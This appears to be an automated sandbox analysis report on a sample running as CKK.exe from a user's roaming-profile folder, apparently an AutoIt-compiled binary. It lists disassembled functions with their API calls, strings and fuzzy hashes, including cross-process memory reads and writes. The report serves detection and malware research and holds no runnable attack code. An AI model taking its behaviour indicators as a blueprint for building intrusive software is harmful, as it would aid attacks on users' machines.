Function 00A2D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A2D752

Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0

_free.LIBCMT ref: 00A2D764
_free.LIBCMT ref: 00A2D776
_free.LIBCMT ref: 00A2D788
_free.LIBCMT ref: 00A2D79A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 30ccba42d501422aaa616afda76aac9190175f35e23b9a3e466c524f256fc02e
Instruction ID: 92544fd284a8280ce8d302b19f92848f3341dcb869a8c86470b6012135e6e82a
Opcode Fuzzy Hash: 30ccba42d501422aaa616afda76aac9190175f35e23b9a3e466c524f256fc02e
Instruction Fuzzy Hash: 52F0FF32544224ABD625EBACFAC5D1677DDBB487207E40D25F048E7513C724FC808764

Uniqueness

Uniqueness Score: -1.00%

Function 00A222A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A222BE

Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0

_free.LIBCMT ref: 00A222D0
_free.LIBCMT ref: 00A222E3
_free.LIBCMT ref: 00A222F4
_free.LIBCMT ref: 00A22305

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c4f4b1e467b845c1e71c723a0ae911a0aca216af8dd96038d365554046e4a9d0
Instruction ID: 21ec0c33b217910eb1faf0742a8417ceaab6870eaed6fbb4864b3cb33298258f
Opcode Fuzzy Hash: c4f4b1e467b845c1e71c723a0ae911a0aca216af8dd96038d365554046e4a9d0
Instruction Fuzzy Hash: 63F03A74900131EBC612EFDCBD01E883B68FB59761B42066AF420D22B2C7350893AFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00A095C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00A095D4
StrokeAndFillPath.GDI32(?), ref: 00A095F0
SelectObject.GDI32(?,00000000), ref: 00A09603
DeleteObject.GDI32 ref: 00A09616
StrokePath.GDI32(?), ref: 00A09631

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 18165a91bba3fd86ce3b2e298ac44aae49b9fe7c891b1f06c04a2aa3f45f7691
Instruction ID: 454203ce91b403d417e24de5b0a8b45b39a194d31ac06e5a377897beaecf2af6
Opcode Fuzzy Hash: 18165a91bba3fd86ce3b2e298ac44aae49b9fe7c891b1f06c04a2aa3f45f7691
Instruction Fuzzy Hash: 5CF01438106608EBDB62DFA9ED1CB653B71AB02372F448214F425590F2C73189A6DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00A20F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00A210F9
__freea.LIBCMT ref: 00A21117

Part of subcall function 00A21537: _free.LIBCMT ref: 00A2154F

Strings

a/p, xrefs: 00A211DE
am/pm, xrefs: 00A2117A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 4aa9dfbf951fab10f327d6af75a7079de5d0c4bb733a8c5dbc4a94729e9ceb40
Instruction ID: 1cf9775c15e556b9369f8bc5550d728e30f149c08d16750617202f65f0c25249
Opcode Fuzzy Hash: 4aa9dfbf951fab10f327d6af75a7079de5d0c4bb733a8c5dbc4a94729e9ceb40
Instruction Fuzzy Hash: 90D10231900226DACB68DF6CE945BFAB7B2FF25310F280279E9019F651D3759D81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A77B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00A10242: EnterCriticalSection.KERNEL32(00AC070C,00AC1884,?,?,00A0198B,00AC2518,?,?,?,009F12F9,00000000), ref: 00A1024D
Part of subcall function 00A10242: LeaveCriticalSection.KERNEL32(00AC070C,?,00A0198B,00AC2518,?,?,?,009F12F9,00000000), ref: 00A1028A

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

Part of subcall function 00A100A3: __onexit.LIBCMT ref: 00A100A9

__Init_thread_footer.LIBCMT ref: 00A77BFB

Part of subcall function 00A101F8: EnterCriticalSection.KERNEL32(00AC070C,?,?,00A08747,00AC2514), ref: 00A10202
Part of subcall function 00A101F8: LeaveCriticalSection.KERNEL32(00AC070C,?,00A08747,00AC2514), ref: 00A10235

Strings

5, xrefs: 00A77C78
G, xrefs: 00A77C7F
Variable must be of type 'Object'., xrefs: 00A77C3A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: f53da8953fd19e861d2df6ffdca806f4a95665c2bff85fb334d3af86499274a4
Instruction ID: 9ec42cc8b2eb7629daaab900656076182ce0a9e0545d0bec7c67690ea4ab28d5
Opcode Fuzzy Hash: f53da8953fd19e861d2df6ffdca806f4a95665c2bff85fb334d3af86499274a4
Instruction Fuzzy Hash: 70916871A04209AFCB14EF94D991EBDB7B1FF48300F10C459F90AAB292DB71AE81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A52716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A521D0,?,?,00000034,00000800,?,00000034), ref: 00A5B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A52760

Part of subcall function 00A5B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A521FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00A5B3F8

Part of subcall function 00A5B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00A5B355
Part of subcall function 00A5B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A52194,00000034,?,?,00001004,00000000,00000000), ref: 00A5B365
Part of subcall function 00A5B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A52194,00000034,?,?,00001004,00000000,00000000), ref: 00A5B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A527CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A5281A

Strings

@, xrefs: 00A52832

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: d321fe6512fbb0ac1bc020f3916449165cceeb6480663d628292045e09d6bd85
Instruction ID: c4f51c6de0789dd749871a8d6059428f2454953b05609678fde1344613e14993
Opcode Fuzzy Hash: d321fe6512fbb0ac1bc020f3916449165cceeb6480663d628292045e09d6bd85
Instruction Fuzzy Hash: 3A411A72900218AFDB10DFA4CD85BEEBBB8BF09711F104099FA55B7181DB706E49CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A2172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\CKK.exe,00000104), ref: 00A21769
_free.LIBCMT ref: 00A21834
_free.LIBCMT ref: 00A2183E

Strings

C:\Users\user\AppData\Roaming\CKK.exe, xrefs: 00A21760, 00A21767, 00A21796, 00A217CE

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Roaming\CKK.exe
API String ID: 2506810119-112244442
Opcode ID: d8196b133ad34b99ac051c20da02da2aaf030a37183dd8db8ee1cfc1f7a7ae71
Instruction ID: d81050278c7df26b0e1c208f2068cf69ed5ff50d3f0b0ebe7a543113e4df0c15
Opcode Fuzzy Hash: d8196b133ad34b99ac051c20da02da2aaf030a37183dd8db8ee1cfc1f7a7ae71
Instruction Fuzzy Hash: 1D315D75A00268EFDB21DF9DA985D9EBBFCEBA5310B154176F80497211D6708E41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A5C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00A5C306
DeleteMenu.USER32 ref: 00A5C34C
DeleteMenu.USER32 ref: 00A5C395

Strings

0, xrefs: 00A5C2DF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: e6c9d4a8cc17450b779798becd7f29fd7584279c9cd9f2e55214532fa01e2aff
Instruction ID: 1cb348092514080d31b3b518f95130dcdd0bce403e4ed8cd1ff490d318780374
Opcode Fuzzy Hash: e6c9d4a8cc17450b779798becd7f29fd7584279c9cd9f2e55214532fa01e2aff
Instruction Fuzzy Hash: 1641A0712043059FD724DF24D884B5ABBE4BF85332F10861DFDA59B295D770E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A84416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A844AA
GetWindowLongW.USER32 ref: 00A844C7
SetWindowLongW.USER32 ref: 00A844D7

Strings

SysTreeView32, xrefs: 00A8447C

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 6ed57b0faa2221b2b94a6d07dac69c38628a480e61c17c1714ab17e58a5c6686
Instruction ID: 2fe2b14614905445fb92166cfc064283d7a8c0b7fa3d4f3d3386b2cb8630bd19
Opcode Fuzzy Hash: 6ed57b0faa2221b2b94a6d07dac69c38628a480e61c17c1714ab17e58a5c6686
Instruction Fuzzy Hash: 5C31C031210206AFDF24AF78DC45BEA7BA9EB08334F204725F979921E1DB70EC519B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A7304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A73077,?,?), ref: 00A73378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A7307A
_wcslen.LIBCMT ref: 00A7309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00A73106

Strings

255.255.255.255, xrefs: 00A73095, 00A7309A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 8dd50f31662e7378176c511d121b69c4719847a1b5e8fc3bc6796d12b472af15
Instruction ID: 14a289a72119b8ead8102e43671e3af465772a8be4fc6d3a8700417257ca6bc4
Opcode Fuzzy Hash: 8dd50f31662e7378176c511d121b69c4719847a1b5e8fc3bc6796d12b472af15
Instruction Fuzzy Hash: 9331B23A6002059FCF10CF68C985EA977E0EF54314F66C159E9198B392D731DE42D760

Uniqueness

Uniqueness Score: -1.00%

Function 00A84653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A84705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A84713
DestroyWindow.USER32 ref: 00A8471A

Strings

msctls_updown32, xrefs: 00A84684

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 2a3ebc4df96b0cad20bd00338ff8d7a53824541b8f74cbb8db72c66960c6321a
Instruction ID: e18de6ceccd5243d0352ac677ad4888ba446fbd8a8c2fbc1f3aad1dee92a084d
Opcode Fuzzy Hash: 2a3ebc4df96b0cad20bd00338ff8d7a53824541b8f74cbb8db72c66960c6321a
Instruction Fuzzy Hash: 0B2130B5600209AFEB10EF64DCC1DB737ADEF9A3A8B150459FA009B251DB71EC52CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A595AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A5961D

Strings

#OnAutoItStartRegister, xrefs: 00A595F3
#requireadmin, xrefs: 00A595D9
#notrayicon, xrefs: 00A595B7

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: f7a45d7da1f0ba080141ceec833e72ec76510e6efdbe163547663f0197a60cc1
Instruction ID: 8f96d30afad5ae9345d2266dc0bc1199aa06db3416976f8d62866fe9bdd2931d
Opcode Fuzzy Hash: f7a45d7da1f0ba080141ceec833e72ec76510e6efdbe163547663f0197a60cc1
Instruction Fuzzy Hash: 01216832204211AAD731BB24DD02FB7B3A8BFA0311F404426FD499F481EB749D9DC391

Uniqueness

Uniqueness Score: -1.00%

Function 00A837B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A83840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A83850
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00A83876

Strings

Listbox, xrefs: 00A8380F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 34e46330fa7e468b31748736033ed0050ad63d89d2f0c7b37ee37c141df33f57
Instruction ID: 21f6885f69fa76d89ac1cb1f295298902513f7d5716c0c451415b1a69b228618
Opcode Fuzzy Hash: 34e46330fa7e468b31748736033ed0050ad63d89d2f0c7b37ee37c141df33f57
Instruction Fuzzy Hash: 3C219272610218BBEF11EF95CC85FBB376EEF89B60F118124F9049B190CA75DC528BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A649F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A64A08
GetVolumeInformationW.KERNEL32 ref: 00A64A5C
SetErrorMode.KERNEL32(00000000,?,?,00A8CC08), ref: 00A64AD0

Strings

%lu, xrefs: 00A64A6F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: e9310a91c8adbbbb9c060fcb4bd4201f0feda5f78b370e01571e7969b012a307
Instruction ID: ce61d7182826f85f8b6e3f06628b931404e407ced20c2750d73968fe8b83172b
Opcode Fuzzy Hash: e9310a91c8adbbbb9c060fcb4bd4201f0feda5f78b370e01571e7969b012a307
Instruction Fuzzy Hash: 7E316275A00109AFDB10DF94C985EAA7BF8EF48318F1480A5F909DB252D771ED46CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A841EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A8424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A84264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A84271

Strings

msctls_trackbar32, xrefs: 00A84226

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 54ff4fccfe7ba60ea9b6d91b81605306a2f57433050a188944be5e7eba0b42a1
Instruction ID: acf0fe51c00f50084855f9e834b8c4e7055631fa79709a8c375a2b8c7c12d317
Opcode Fuzzy Hash: 54ff4fccfe7ba60ea9b6d91b81605306a2f57433050a188944be5e7eba0b42a1
Instruction Fuzzy Hash: AB110631244209BEEF20AF79CC06FEB3BACEF99B64F110524FA55E2090D671DC219B20

Uniqueness

Uniqueness Score: -1.00%

Function 00A52F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A

Part of subcall function 00A52DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A52DC5
Part of subcall function 00A52DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A52DD6
Part of subcall function 00A52DA7: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00A52DDD
Part of subcall function 00A52DA7: AttachThreadInput.USER32(00000000,?,00000000), ref: 00A52DE4

GetFocus.USER32 ref: 00A52F78

Part of subcall function 00A52DEE: GetParent.USER32(00000000), ref: 00A52DF9

GetClassNameW.USER32(?,?,00000100), ref: 00A52FC3
EnumChildWindows.USER32 ref: 00A52FEB

Strings

%s%d, xrefs: 00A52FFF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 32740c8cc4a20127391bbc3c4a9e1d2ee30c5e18c2fa45a3c0ef3700e0858c6c
Instruction ID: 470d286cf46d5c0b26d957d9dcf952f79659e3a5894dda8d237607e459e4ab32
Opcode Fuzzy Hash: 32740c8cc4a20127391bbc3c4a9e1d2ee30c5e18c2fa45a3c0ef3700e0858c6c
Instruction Fuzzy Hash: F21190726002096BCF54BFA49D85FED376ABF85316F048075BD099B192DF309A498B70

Uniqueness

Uniqueness Score: -1.00%

Function 00A85882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00A858C1
SetMenuItemInfoW.USER32 ref: 00A858EE
DrawMenuBar.USER32 ref: 00A858FD

